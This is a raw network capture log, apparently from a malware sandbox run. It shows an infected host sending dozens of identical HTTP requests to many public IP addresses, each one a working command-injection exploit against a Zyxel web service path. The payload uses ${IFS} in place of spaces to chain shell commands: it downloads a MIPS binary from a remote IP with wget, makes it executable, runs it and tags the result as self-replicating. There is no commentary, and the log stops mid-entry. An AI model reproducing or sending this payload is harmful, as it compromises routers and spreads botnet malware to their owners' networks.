                                    Jan 13, 2024 19:02:40.321594000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5936192.168.2.135141846.26.145.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321666956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5937192.168.2.1356960164.39.59.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321727037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5938192.168.2.1334606129.139.254.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321780920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5939192.168.2.135357699.35.100.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321830034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5940192.168.2.134063079.159.26.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321866989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5941192.168.2.1358820110.191.62.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321939945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5942192.168.2.1352656133.172.198.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.321989059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5943192.168.2.1344354113.224.227.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322053909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5944192.168.2.1341156211.28.54.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322104931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5945192.168.2.1358056171.9.177.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322169065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5946192.168.2.1342096200.229.44.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322225094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5947192.168.2.1335958207.120.191.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322292089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5948192.168.2.133793259.120.62.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322355986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5949192.168.2.1355930124.196.254.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322422028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5950192.168.2.1354764181.239.69.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322473049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5951192.168.2.134633834.151.162.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322499990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5952192.168.2.1355958186.2.227.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322577000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5953192.168.2.136031235.245.234.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322627068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5954192.168.2.134967471.167.103.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322679043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5955192.168.2.1346644155.137.30.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322784901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5956192.168.2.1355470208.251.68.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322813988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5957192.168.2.1334264151.253.56.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322890043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5958192.168.2.134462678.81.14.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.322952986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5959192.168.2.135339260.201.252.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323014021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5960192.168.2.1336366159.122.107.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323060036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5961192.168.2.1349456136.217.144.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323100090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5962192.168.2.1354354222.53.170.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323153019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5963192.168.2.1344704152.20.187.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323225975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5964192.168.2.134388848.40.170.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323291063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5965192.168.2.134605697.248.173.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323329926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5966192.168.2.1338364159.162.145.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323385000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5967192.168.2.1349786197.205.18.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323474884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5968192.168.2.13507162.235.81.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323539972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5969192.168.2.1360644174.159.202.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323585987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5970192.168.2.1345138163.230.93.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323648930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5971192.168.2.1334408211.206.188.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323714018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5972192.168.2.1334376154.205.89.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323780060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5973192.168.2.13400584.128.138.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323895931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5974192.168.2.133582482.124.174.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.323965073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5975192.168.2.1347006202.54.60.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324022055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5976192.168.2.135837846.229.5.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324075937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5977192.168.2.133929618.215.182.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324119091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5978192.168.2.135226623.238.227.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324194908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5979192.168.2.1335044107.2.117.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324242115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5980192.168.2.1337224102.247.204.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324280977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5981192.168.2.135905818.162.60.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324366093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5982192.168.2.134330258.27.200.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324407101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5983192.168.2.1345502132.161.224.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324475050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5984192.168.2.135742092.100.49.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324510098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5985192.168.2.1349924210.229.7.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324561119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5986192.168.2.134952872.56.140.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324666977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5987192.168.2.1341530128.186.193.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324692965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5988192.168.2.1357530144.210.63.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324759007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5989192.168.2.1333962209.144.57.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324804068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5990192.168.2.1333756112.203.194.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324867964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5991192.168.2.134379437.133.184.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324914932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5992192.168.2.1358924101.115.183.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.324974060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5993192.168.2.1355190179.185.199.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325026035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5994192.168.2.1342230209.40.161.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325081110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5995192.168.2.135994672.103.144.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325129986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5996192.168.2.1354496185.179.138.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325181007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5997192.168.2.1338018128.148.131.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.325242996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5998192.168.2.1340494186.123.216.38443
                                    TimestampBytes transferredDirectionData
